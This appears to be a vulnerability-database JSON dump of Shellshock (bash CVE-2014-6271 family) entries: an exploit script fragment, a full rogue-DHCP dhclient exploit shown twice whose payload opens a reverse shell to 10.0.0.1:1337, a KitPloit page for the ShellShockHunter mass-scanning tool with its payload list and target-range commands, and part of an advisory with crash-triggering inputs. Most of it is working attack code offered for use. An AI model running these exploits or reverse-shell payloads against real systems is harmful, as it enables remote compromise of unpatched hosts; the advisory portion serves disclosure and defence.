url\r\n\r\n\r\ndef get_url_need(url):\r\n url_need = None\r\n\r\n url = fix_url(url)\r\n\r\n if url.endswith('.cgi') or url.endswith('.sh'):\r\n url_need = url\r\n return url_need\r\n\r\n url = get_url(url)\r\n url_need = get_link(url)\r\n\r\n if not url_need:\r\n #print '[*] get url need error'\r\n url_need = url\r\n\r\n info = url_need\r\n #print info\r\n return info\r\n\r\n\r\ndef get_link(url):\r\n rnt = ''\r\n try:\r\n page_content = urllib2.urlopen(url).read()\r\n match = re.findall(r'''(?:href|action|src)\\s*?=\\s*?(?:\"|')\\s*?([^'\"]*?\\.(?:cgi|sh|pl))''', page_content)\r\n for item_url in match:\r\n if not item_url.startswith('http'):\r\n item_url = getAbsoluteURL(url, item_url)\r\n if not is_url_exist(item_url):\r\n continue\r\n if isSameDomain(item_url, url):\r\n rnt = item_url\r\n break\r\n return rnt\r\n except Exception, e:\r\n #raise e\r\n return rnt\r\n\r\n\r\ndef getAbsoluteURL(base, url):\r\n url1 = urljoin(base, url)\r\n arr = urlparse(url1)\r\n path = normpath(arr[2])\r\n return urlunparse((arr.scheme, arr.netloc, path, arr.params, arr.query, arr.fragment))\r\n\r\ndef is_url_exist(url):\r\n try:\r\n urllib2.urlopen(url)\r\n except urllib2.HTTPError, e:\r\n return not e.code == 404\r\n return True\r\n\r\n\r\ndef isSameDomain(url1, url2):\r\n return True\r\n try:\r\n if urlparse(url1).netloc.split(':')[0] == urlparse(url2).netloc.split(':')[0]:\r\n return True\r\n else:\r\n return False\r\n except Exception, e:\r\n return False\r\n\r\n\r\nif __name__ == \"__main__\":\r\n cmdline.main(io_info, usage='', argvs=[])\r\n if io_info['Verbose']:\r\n print '\\n[*] Init ...\\n'\r\n main(io_info)\r\n print generic.output(io_info)\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-88877", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:12:10", "description": "No description provided by source.", "published": "2014-10-10T00:00:00", "type": "seebug", "title": "GNU bash 4.3.11 Environment Variable dhclient Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2014-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87313", "id": "SSV:87313", "sourceData": "\n #!/usr/bin/python\r\n# Exploit Title: dhclient shellshocker\r\n# Google Dork: n/a\r\n# Date: 10/1/14\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: gnu.org\r\n# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz\r\n# Version: 4.3.11\r\n# Tested on: Ubuntu 14.04.1\r\n# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187\r\n# ______ ______ ______ _ \r\n# / __ | / __ |/ __ | _ (_) \r\n#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___\r\n#| |// | ( \\ / ) |// | | |// | |/___) _) / ___) | _ \\ / _ |/___)\r\n#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ |\r\n# \\_____/(_/ \\_)\\_____/ \\_____/(___/ \\___)_| |_|_| |_|\\_|| (___/\r\n# (_____| \r\n# _ _ _ _ \r\n# | | | | (_) _ \r\n# _ | | | _ ____| |_ ____ ____ | |_ \r\n# / || | || \\ / ___) | |/ _ ) _ \\| _)\r\n#( (_| | | | ( (___| | ( (/ /| | | | |__\r\n# \\____|_| |_|\\____)_|_|\\____)_| |_|\\___) \r\n#\r\n# _ _ _ _ _ \r\n# | | | | | | | | | \r\n# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____\r\n# /___) || \\ / _ ) | |/___) || \\ / _ \\ / ___) | / ) _ )/ ___)\r\n#|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| | \r\n#(___/|_| |_|\\____)_|_(___/|_| |_|\\___/ \\____)_| \\_)____)_| \r\n \r\n# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts\r\n# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out\r\n# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.\r\n# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example.\r\n \r\nimport socket, struct\r\ndef HexToByte( hexStr ):\r\n b = []\r\n h = ''.join( h.split(" ") )\r\n for i in range(0, len(h), 2):\r\n b.append( chr( int (h[i:i+2], 16 ) ) )\r\n return ''.join( b )\r\n \r\nrport = 68\r\nlport = 67\r\n \r\nbsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n \r\nbsock.bind(("<broadcast>", lport))\r\n \r\nwhile True:\r\n \r\n OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114\r\n URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex")\r\n URLLEN = chr(len(URL) / 2).encode("hex")\r\n END = "03040a000001ff"\r\n broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048)\r\n hexip = broadcast_get[245:249]\r\n rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3]))\r\n XID = broadcast_get[4:8].encode("hex")\r\n chaddr = broadcast_get[29:34].encode("hex")\r\n print "[+]\\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\\n"\r\n OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END\r\n OFFER_BYTES = HexToByte(OFFER)\r\n ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END\r\n ACK_BYTES = HexToByte(ACK)\r\n print "[+]\\tsending evil offer\\n"\r\n sock.sendto(OFFER_BYTES, (rhost, rport))\r\n broadcast_get2 = bsock.recvfrom(2048)\r\n print "[+]\\tassuming request was received, sending ACK\\n"\r\n sock.sendto(ACK_BYTES, (rhost, rport))\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87313", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2021-02-10T17:29:16", "bulletinFamily": "tools", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "[  ](<https://1.bp.blogspot.com/-0uoufiV7eMQ/YBomKPcypwI/AAAAAAAAVP4/Wxtfj_SlhOc5FZpJxeZNGeTaXDaX47YGgCNcBGAsYHQ/s1026/ShellShockHunter_1_banner.png>)\n\n \n\n\nIt's a simple tool for test [ vulnerability ](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) shellshock \n \n \n Autor: MrCl0wn \n Blog: http://blog.mrcl0wn.com \n GitHub: https://github.com/MrCl0wnLab \n Twitter: https://twitter.com/MrCl0wnLab \n Email: mrcl0wnlab\\@\\gmail.com \n \n\n \n** Shellshock (software bug) ** \n\n\nShellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. \n\n \n\n\n** Disclaimer ** \n\n\nThis or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me ( _ ** MrCl0wnLab ** _ ) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not _ ** MrCl0wnLab's ** _ responsibility. \n\n \n** Installation ** \n\n\n> Use the package manager [ pip ](<https://pip.pypa.io/en/stable/> \"pip\" )\n\n \n** Pip ** \n\n \n \n pip install shodan \n pip install ipinfo \n \n\n \n** Help ** \n\n \n \n python main.py --help \n \n usage: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>] [--cmd-cgi <command shell>] [--exec-vuln <command shell>] [--thread <10>] [--check] [--ssl] [--cgi-file <cgi.txt>] [--timeout <5>] [--all] [--debug] \n \n optional arguments: \n -h, --help show this help message and exit \n --file <ips.txt> File targets \n --range <ip-start>,<ip-end> \n Range IP Ex: 192.168.15.1,192.168.15.100 \n --cmd-cgi <command shell> \n Command: uname -a \n --exec-vuln <command shell> \n Executing commands on [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) targets \n --thread <10>, -t <10> \n Eg. 20 \n --check Checker vuln \n --ssl Set protocol https \n --cgi-file &l t;cgi.txt> \n Set file cgi \n --timeout <5> Set timeout conection \n --all Teste all payloads \n --debug Set debugs \n \n\n \n** Command e.g: ** \n\n \n \n python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl \n \n python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' \n \n python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' \n \n python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' \n \n python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all \n \n python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i \"_TARGET_\"' \n \n python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t \"_TARGET_\"' \n \n\n \n** Prints: ** \n \n** START ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-MdxD0XgsSb4/YBomQXoso_I/AAAAAAAAVP8/GxQJ2_Y3jSkk-mgzAh4iitbn-FPp5C1gQCNcBGAsYHQ/s2048/ShellShockHunter_7_print01.png>)\n\n \n\n\n** PROCESS ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-LK-WmnRDLLQ/YBomUD7OAJI/AAAAAAAAVQA/BwvzCByoNVEPHJbJDiTOiypVS_6dHdInACNcBGAsYHQ/s2532/ShellShockHunter_8_print02.png>)\n\n \n\n\n** EXPECIAL COMMAND ( --exec-vuln 'echo ` \"_TARGET_\" ` ' ) ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-0SgCqQKSGkY/YBomXrfQz4I/AAAAAAAAVQE/L1oQZ7vbfTkEvLhruhZWKwgiarRdbqD1QCNcBGAsYHQ/s2548/ShellShockHunter_9_print03.png>)\n\n \n\n\n** Source file ( Exploits ) ** \n\n\n> pwd: assets/exploits.json \n \n \n { \n \"DEFAULT\": \n \"() { :; }; echo ; /bin/bash -c '_COMMAND_'\", \n \"CVE-2014-6271\": \n \"() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'\", \n \"CVE-2014-6271-2\": \n \"() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'\", \n \"CVE-2014-6271-3\": \n \"() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;\", \n \"CVE-2014-7169\": \n \"() { (a)=>\\\\' /bin/bash -c 'echo _CHECKER_'; cat echo\", \n \"CVE-2014-7186\": \n \"/bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo '_CHECKER_, redir_stack'\", \n \"CVE-2014-7187\": \n \"(for x in {1..200} ; do echo \\\"for x$x in ; do :\\\"; done; for x in {1..200} ; do echo done ; done) | /bin/bash || echo '_CHECKER_, word_lineno'\", \n \"CVE-2014-6278\": \n \"() { _; } >_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'\", \n \"CVE-2014-6278-2\": \n \"shellshocker='() { echo _CHECKER_; }' bash -c shellshocker\", \n \"CVE-2014-6277\": \n \"() { x() { _; }; x() { _; } <<a; } /bin/bash -c _COMMAND_;echo _CHECKER_\", \n \"CVE-2014-*\": \n \"() { }; echo _CHECKER_' /bin/bash -c '_COMMAND_'\" \n }\n\n \n** Source file ( Config ) ** \n\n\n> pwd: assets/config.json \n \n \n { \n \"config\": { \n \"threads\": 10, \n \"path\": { \n \"path_output\": \"output/\", \n \"path_wordlist\": \"wordlist/\", \n \"path_modules\": \"modules/\", \n \"path_assets\": \"assets/\" \n }, \n \"files_assets\":{ \n \"config\": \"assets/config.json\", \n \"autor\": \"assets/autor.json\", \n \"exploits\": \"assets/exploits.json\" \n }, \n \"api\":{ \n \"shodan\":\"\", \n \"ipinfo\":\"\" \n } \n } \n }\n\n \n** Tree ** \n\n \n \n \u251c\u2500\u2500 assets \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 autor.json \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 config.json \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 exploits.json \n \u2502\u00a0\u00a0 \u2514\u2500\u2500 prints \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 banner.png \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 print01.png \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 print02.png \n \u2502\u00a0\u00a0 \u2514\u2500\u2500 print03.png \n \u251c\u2500\u2500 main.py \n \u251c\u2500\u2500 modules \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 banner_shock.py \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 color_shock.py \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 file_shock.py \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 __init__.py \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 request_shock.py \n \u2502\u00a0\u00a0 \u251c\u2500\u2500 shodan_shock.py \n \u2502\u00a0\u00a0 \u2514\u2500─ ; thread_shock.py \n \u251c\u2500\u2500 output \n \u2502\u00a0\u00a0 \u2514\u2500\u2500 vuln.txt \n \u251c\u2500\u2500 README.md \n \u2514\u2500\u2500 wordlist \n \u2514\u2500\u2500 cgi.txt\n\n \n** Ref ** \n\n\n * [ https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf ](<https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf> \"https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf\" )\n * [ https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details ](<https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details> \"https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details\" )\n * [ https://blog.inurl.com.br/search?q=shellshock ](<https://blog.inurl.com.br/search?q=shellshock> \"https://blog.inurl.com.br/search?q=shellshock\" )\n * [ https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck/blob/master/xplSHELLSHOCK.php ](<https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck/blob/master/xplSHELLSHOCK.php> \"https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck/blob/master/xplSHELLSHOCK.php\" )\n * [ https://github.com/chelseakomlo/shellshock_demo ](<https://github.com/chelseakomlo/shellshock_demo> \"https://github.com/chelseakomlo/shellshock_demo\" )\n * [ https://github.com/xdistro/ShellShock/blob/master/shellshock_test.sh ](<https://github.com/xdistro/ShellShock/blob/master/shellshock_test.sh> \"https://github.com/xdistro/ShellShock/blob/master/shellshock_test.sh\" )\n * [ https://github.com/capture0x/XSHOCK/blob/master/main.py ](<https://github.com/capture0x/XSHOCK/blob/master/main.py> \"https://github.com/capture0x/XSHOCK/blob/master/main.py\" )\n * [ https://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html ](<https://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html> \"https://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\" )\n * [ https://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html ](<https://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html> \"https://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html\" )\n * [ https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1410-exploits/apachemodcgi-shellshock.txt ](<https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1410-exploits/apachemodcgi-shellshock.txt> \"https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1410-exploits/apachemodcgi-shellshock.txt\" )\n * [ https://github.com/gajos112/OSCP/blob/master/Shellshock.txt ](<https://github.com/gajos112/OSCP/blob/master/Shellshock.txt> \"https://github.com/gajos112/OSCP/blob/master/Shellshock.txt\" )\n * [ https://dl.packetstormsecurity.net/1606-exploits/sunsecuregdog-shellshock.txt ](<https://dl.packetstormsecurity.net/1606-exploits/sunsecuregdog-shellshock.txt> \"https://dl.packetstormsecurity.net/1606-exploits/sunsecuregdog-shellshock.txt\" )\n * [ http://stuff.ipsecs.com/files/ucs-shellshock_pl.txt ](<http://stuff.ipsecs.com/files/ucs-shellshock_pl.txt> \"http://stuff.ipsecs.com/files/ucs-shellshock_pl.txt\" )\n * [ https://github.com/opsxcq/exploit-CVE-2014-6271 ](<https://github.com/opsxcq/exploit-CVE-2014-6271> \"https://github.com/opsxcq/exploit-CVE-2014-6271\" )\n * [ https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details ](<https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details> \"https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details\" )\n * [ https://manualdousuario.net/shellshock-bash-falha/ ](<https://manualdousuario.net/shellshock-bash-falha/> \"https://manualdousuario.net/shellshock-bash-falha/\" )\n * [ https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit ](<https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit> \"https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit\" )\n \n** Roadmap ** \n\n\nI started this project to study a little more python and interact more with APIS like shodan and ipinfo. \n\n * Command line structure \n * Banner \n * File [ management ](<https://www.kitploit.com/search/label/Management> \"management\" ) class \n * HttpRequests management class \n * Thread management class \n * Source file for exploits \n * Color in process \n * Shell Exec on vulnerable targets \n * Process debug \n * Integration with ipinfo api \n * Integration with ipinfo api \n * Integration with telegram api \n * [ Backdoor ](<https://www.kitploit.com/search/label/Backdoor> \"Backdoor\" ) creation \n * Visual filter \n * Header manipulation \n \n \n\n\n** [ Download ShellShockHunter ](<https://github.com/MrCl0wnLab/ShellShockHunter> \"Download ShellShockHunter\" ) **\n", "edition": 1, "modified": "2021-02-10T11:30:10", "published": "2021-02-10T11:30:10", "id": "KITPLOIT:2779031464033627796", "href": "http://www.kitploit.com/2021/02/shellshockhunter-its-simple-tool-for.html", "title": "ShellShockHunter - It's A Simple Tool For Test Vulnerability Shellshock", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:42", "description": "", "published": "2014-10-02T00:00:00", "type": "packetstorm", "title": "GNU Bash 4.3.11 dhclient Shellshocker", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2014-10-02T00:00:00", "id": "PACKETSTORM:128535", "href": "https://packetstormsecurity.com/files/128535/GNU-Bash-4.3.11-dhclient-Shellshocker.html", "sourceData": "`#!/usr/bin/python \n# Exploit Title: dhclient shellshocker \n# Google Dork: n/a \n# Date: 10/1/14 \n# Exploit Author: @0x00string \n# Vendor Homepage: gnu.org \n# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz \n# Version: 4.3.11 \n# Tested on: Ubuntu 14.04.1 \n# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 \n# ______ ______ ______ _ \n# / __ | / __ |/ __ | _ (_) \n#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___ \n#| |// | ( \\ / ) |// | | |// | |/___) _) / ___) | _ \\ / _ |/___) \n#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ | \n# \\_____/(_/ \\_)\\_____/ \\_____/(___/ \\___)_| |_|_| |_|\\_|| (___/ \n# (_____| \n# _ _ _ _ \n# | | | | (_) _ \n# _ | | | _ ____| |_ ____ ____ | |_ \n# / || | || \\ / ___) | |/ _ ) _ \\| _) \n#( (_| | | | ( (___| | ( (/ /| | | | |__ \n# \\____|_| |_|\\____)_|_|\\____)_| |_|\\___) \n# \n# _ _ _ _ _ \n# | | | | | | | | | \n# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____ \n# /___) || \\ / _ ) | |/___) || \\ / _ \\ / ___) | / ) _ )/ ___) \n#|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| | \n#(___/|_| |_|\\____)_|_(___/|_| |_|\\___/ \\____)_| \\_)____)_| \n \n# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts \n# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out \n# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability. \n# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example. \n \nimport socket, struct \ndef HexToByte( hexStr ): \nb = [] \nh = ''.join( h.split(\" \") ) \nfor i in range(0, len(h), 2): \nb.append( chr( int (h[i:i+2], 16 ) ) ) \nreturn ''.join( b ) \n \nrport = 68 \nlport = 67 \n \nbsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \n \nbsock.bind((\"<broadcast>\", lport)) \n \nwhile True: \n \nOP = \"72\" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114 \nURL = \"() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1\".encode(\"hex\") \nURLLEN = chr(len(URL) / 2).encode(\"hex\") \nEND = \"03040a000001ff\" \nbroadcast_get, (bcrhost, rport) = bsock.recvfrom(2048) \nhexip = broadcast_get[245:249] \nrhost = str(ord(hexip[0])) + \".\" + str(ord(hexip[1])) + \".\" + str(ord(hexip[2])) + \".\" + str(ord(hexip[3])) \nXID = broadcast_get[4:8].encode(\"hex\") \nchaddr = broadcast_get[29:34].encode(\"hex\") \nprint \"[+]\\tgot broadcast with XID \" + XID + \" requesting IP \" + rhost + \"\\n\" \nOFFER = \"02010600\" + XID + \"00000000000000000a0000430a0000010000000000\" + chaddr + \"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65\" + OP + URLLEN + URL + END \nOFFER_BYTES = HexToByte(OFFER) \nACK = \"02010600\" + XID + \"00000000000000000a0000430a0000010000000000\" + chaddr + \"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65\" + OP + URLLEN + URL + END \nACK_BYTES = HexToByte(ACK) \nprint \"[+]\\tsending evil offer\\n\" \nsock.sendto(OFFER_BYTES, (rhost, rport)) \nbroadcast_get2 = bsock.recvfrom(2048) \nprint \"[+]\\tassuming request was received, sending ACK\\n\" \nsock.sendto(ACK_BYTES, (rhost, rport)) \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128535/bash4311-dhclient.txt"}, {"lastseen": "2016-12-05T22:12:54", "description": "", "published": "2014-10-01T00:00:00", "type": "packetstorm", "title": "Bash Me Some More", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6279", "CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2014-10-01T00:00:00", "id": "PACKETSTORM:128520", "href": "https://packetstormsecurity.com/files/128520/Bash-Me-Some-More.html", "sourceData": "`Good morning! This is kinda long. \n \n== Background == \n \nIf you are not familiar with the original bash function export \nvulnerability (CVE-2014-6271), you may want to have a look at this \narticle: \n \nhttp://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html \n \nWell, long story short: the initial maintainer-provided patch for this \nissue [1] (released on September 24) is *conclusively* broken. \n \nAfter nagging people to update for a while [5] [7], I wanted to share \nthe technical details of two previously non-public issues which may be \nused to circumvent the original patch: CVE-2014-6277 and \nCVE-2014-6278. \n \nNote that the issues discussed here are separate from the three \nprobably less severe problems publicly disclosed earlier on: Tavis' \nlimited-exploitability EOL bug (CVE-2014-7169) and two likely \nnon-exploitable one-off issues found by Florian Weimer and Todd Sabin \n(CVE-2014-7186 and CVE-2014-7187). \n \n== Required actions == \n \nIf you have installed just the September 24 patch [1], or that and the \nfollow-up September 26 patch for CVE-2014-7169 [2], you are likely \nstill vulnerable to RCE and need to update ASAP, as discussed in [5]. \n \nYou are safe if you have installed the unofficial function prefix \npatch from Florian Weimer [3], or its upstream variant released on \nSeptember 28 [4]. The patch does not eliminate the problems, but \nshields the underlying parser from untrusted inputs under normal \ncircumstances. \n \nNote: over the past few days, Florian's patch has been picked up by \nmajor Linux distros (Red Hat, Debian, SUSE, etc), so there is a \nreasonable probability that you are in good shape. To test, execute \nthis command from within a bash shell: \n \nfoo='() { echo not patched; }' bash -c foo \n \nIf you see \"not patched\", you probably want upgrade immediately. If \nyou see \"bash: foo: command not found\", you're OK. \n \n== Vulnerability details: CVE-2014-6277 (the more involved one) == \n \nThe following function definition appearing in the value of any \nenvironmental variable passed to bash will lead to an attempt to \ndereference attacker-controlled pointers (provided that the targeted \ninstance of bash is protected only with the original patches [1][2] \nand does not include Florian's fix): \n \n() { x() { _; }; x() { _; } <<a; } \n \nA more complete example leading to a deref of 0x41414141 would be: \n \nHTTP_COOKIE=\"() { x() { _; }; x() { _; } <<`perl -e '{print \n\"A\"x1000}'`; }\" bash -c : \n \nbash[25662]: segfault at 41414141 ip 00190d96 sp bfbe6354 error 4 in \nlibc-2.12.so[110000+191000] \n \n(If you are seeing 0xdfdfdfdf, see note later on). \n \nThe issue is caused by an uninitialized here_doc_eof field in a REDIR \nstruct originally created in make_redirection(). The initial segv will \nhappen due to an attempt to read and then copy a string to a new \nbuffer through a macro that expands to: \n \nstrcpy (xmalloc (1 + strlen (redirect->here_doc_eof)), (redirect->here_doc_eof)) \n \nThis appears to be exploitable in at least one way: if here_doc_eof is \nchosen by the attacker to point in the vicinity of the current stack \npointer, the apparent contents of the string - and therefore its \nlength - may change between stack-based calls to xmalloc() and \nstrcpy() as a natural consequence of an attempt to pass parameters and \ncreate local variables. Such a mid-macro switch will result in an \nout-of-bounds write to the newly-allocated memory. \n \nA simple conceptual illustration of this attack vector would be: \n \n-- snip! -- \nchar* result; \nint len_alloced; \n \nmain(int argc, char** argv) { \n \n/* The offset will be system- and compiler-specific */; \nchar* ptr = &ptr - 9; \n \nresult = strcpy (malloc(100 + (len_alloced = strlen(ptr))), ptr); \n \nprintf(\"requested memory = %d\\n\" \n\"copied text = %d\\n\", len_alloced + 1, strlen(result) + 1); \n \n} 